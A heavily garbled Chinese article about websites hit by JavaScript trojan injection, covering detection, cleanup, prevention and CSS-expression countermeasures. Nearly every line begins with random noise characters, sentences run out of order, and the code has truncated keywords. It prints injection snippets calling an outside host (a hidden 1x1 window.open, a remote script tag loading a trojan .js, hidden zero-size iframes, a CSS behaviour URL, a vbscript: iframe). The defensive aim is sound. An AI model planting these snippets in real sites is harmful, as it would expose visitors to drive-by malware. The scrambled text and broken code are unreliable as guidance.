网站被JS挂马解决方法
$ W$ S7 B* z7 {" r0 p) j6 M/ J" Y为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范
+ z) [% B" F& D" z% z' N. cIFRAME 和 JS 脚本挂马。 4 z( M: }5 {; }* B5 `8 |9 A
检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp, , D1 T' X7 t- R' A) g
网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、
- f- r9 c' Z" H. p如何清除网页木马。如何防止网页被挂马。 1: 网页挂马的种类 .
( Y. n1 E4 A$ t# G8 c3 C) K1 F相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的
( {1 X7 t, y4 O6 U卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马
; ?* t( A. N7 L! J3 f利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权 ; r1 T1 }" \' f( l6 z( j; e: N" Q
。一千多位会员的 ID
# Z2 _" s& D% s9 h0 u# V2: 如何检测网页是否被挂马。
[& z+ M6 F& |, p0 |' l0 t六款免费网页平安检测工具横向测评 ( 华军软件园 ) 1 专业检测工具。>
0 a0 \$ ]1 {) k, B2 E6 e或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全 , o5 l& D& b0 Y$ q3 b/ O
因素。 2 googl 检测。> 6 {# L6 \; R+ S }& n$ S' k$ i$ F$ y
常用的杀毒软件也可以检测出来。 3 杀毒软件检测。>
% b0 W) f% {) W8 k$ C9 x( W打开你网站、博客, 4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。
7 K7 S8 t7 v- x/ |$ ^5 U& ~0 Z5 使用 McAfee SiteAdvisor 平安浏览网页的插件。 ' E U) ?! [4 s6 a5 u2 z% j9 p
6 T/ t" W9 ~& _3: 如何清除网页木马。
6 n$ o, L0 Z1 I- T/ a/ B& r就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进
; c+ ^: I# Y, \/ B. [入源文件把相关的网页挂马种类的可疑代码删除。 - l% l/ k; m! T
建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟
9 S' g& c) S5 Z! I `) E; O悉。> & r; j# g, y/ y
请从预防开始吧。 4: 如何防止网页被挂马。如果你网站还没有被挂马。>
% w: A, b0 A3 }( Z* E4 m$ _4 G+ ?并只允许信任的人使用上传程序。 1 对网友开放上传附件功能的网站一定要进行身份认证。>
9 K4 o( l* T- u7 m2 保证你所使用的顺序及时的更新。 . Y$ r: I8 @8 l T3 w
3 不要在前台网页上加注后台管理程序登陆页面的链接。
- g9 P5 M A: Z& G. H, L0 w* |但不要把备份数据库放在顺序默认的备份目录下。 4 要时常备份数据库等重要文件。>
5 h: z- s1 z$ n+ v: j, \0 r不能过于简单。 5 管理员的用户名和密码要有一定复杂性。>
l* n6 b; i" z% y" W二项功能组合, 6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。 ; P4 g3 }' W0 ^/ n
设置执行权限选项中, 7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。
4 s' j+ ?0 ]1 z9 n. w. r& F8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客
9 r) Q* Q" p" d! O' y& p4 L; C/ d/ k) `% J, o. w/ o
IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式
% P" Y, E# G% L! [6 |。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。 9 {3 b6 u" |' f4 n s: Q
JS 挂马溯源 9 U& |% W& y# F7 Z0 O: y) ~4 M" x
有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方
7 J" P# G* @$ Q* \# R法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。 0 ]" U2 k+ E4 S. b' x
很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS
3 J( Z% u/ E5 W) J$ L4 f' T脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。
: y' o" u. A3 X一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示
: {! M, ~; T: n大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而 ) T: o0 Q9 c1 s1 z- t% P; f6 n
JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。
" M6 L4 n* i) {4 [& i1 v) ^% j/ g但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编 2 ~' Q# _4 h. |5 v# n3 G; C
程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS . R% W. g+ ~0 V+ b9 r1 P
脚本在工作中会有很大的协助。
0 s/ @) A* X- r! n3 r7 K2 Z挂马原理一点通 ; n i- D, M# V) ^: K
可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以
5 t" M. Z, L1 y6 i4 U) C& U1 `" ?通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,
& B- Q% W9 h1 Z' q: |无从区分木马在何处。 ; n7 I% L& H, Q# |- M% P
如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂
' e0 t% o+ j3 k8 S) }马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很 2 @) d9 p! R3 a/ n; s
容易蒙混过关,导致木马久杀不绝。 ' w3 L6 p/ a( b4 m) Y$ Y) a' p
JS 挂马攻防实录 3 m+ l' ?& ~4 i% F+ g
一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的 : {4 o V( o1 T# g, t
挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。 & j& z0 Y6 m; I4 X% X" g
这种方法使用的关键代码如下: U3 d$ N5 O& u# t, w6 t) T
"", window.open "http://www.v404.cn/ 木马
" S) k& t) m: G.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ; ' Z# x, }: u# j2 n7 I
3 n' ?5 {5 E2 R. @8 C7 |, g很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0 + b5 p5 d$ V# o0 e- Z# A/ d' Y
但是设置为 0 后,可能会出现恶意代码不运行的情况。 / \2 o2 ^. |3 S2 l2 x4 S, u, y
并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “ / E5 N/ h! B W/ L2 }& S2 A8 y; A m
document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件
4 N2 T# f/ D4 P$ c( g0 I。
4 O; d% _1 I o- k# E<script src="http://www.v404.cn/ 木马脚本 .js"></script> + u# X4 `" W: w4 }2 M7 ^" m6 v
b9 R0 `6 g/ n# w0 n
或者 & d2 n, F9 x$ ^9 E
document.writ "<div style='display:none'>"
; T. M; C. n0 M2 J( g+ E5 Ldocument.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>" 2 r* {( L3 F# Q4 g8 j& j& A; n
document.writ "</div>" 7 H3 Z8 y$ s% P2 v' q" Y' |7 Z
6 C( t" Y6 f O+ M9 r就成功地将木马挂到对方的网页中了 1 r& j) x' B E6 e, \8 T
例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。
! D0 p: G% O5 O( F<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">
* \* ?% z4 x r" C或者:
! |0 t; N1 e8 B) {2 O/ W<ifram src="vbscript:[ 挂马脚本 ]">
. z6 I" a2 I! N4 o% k/ D [: M9 m! J+ p6 S
等等 …
3 U$ ~- I6 l y0 }不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法 % V5 s5 t/ s3 d% ?& S
就是阻止 Src 请求的异地外域的 JS 脚本,代码如下: ! [, l$ r# C% ?5 H* `- q9 N
iframe{mdy1:express this.src='about:blank', < iframe{mdy1:express this.src='about:blank'.this.outerHTML='' ; c7 o4 P) |9 a# ~
;}
; Z% U5 p( {$ `, p6 J6 `script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
* i( Y3 a) Q1 p
2 \8 m1 t" j, o, n1 Q不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。
8 z7 a, Y5 _' F% X- m* R这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的 4 ^ ~) k( C( E. w& B
CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了
: C8 e$ b: X& N. FWriter 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。 ' O9 Y7 V* p7 P' c
<title> 让 JS 挂马中止的 CSS 代码 </title>
, R4 Q, t9 n, }5 t W, r<styl type="text/css" id="shudoo"> % D D" u. m" l# r0 L
/*<![CDATA[*/
$ v+ P, h5 d+ d3 X* h, {& rthis.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}
. n( a5 z9 R' W/ f2 S, p0 lscript{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}
5 |/ Q4 |& z2 `4 K1 O/*]]>*/
2 y3 _9 F7 y- @, P( |+ x</style>
|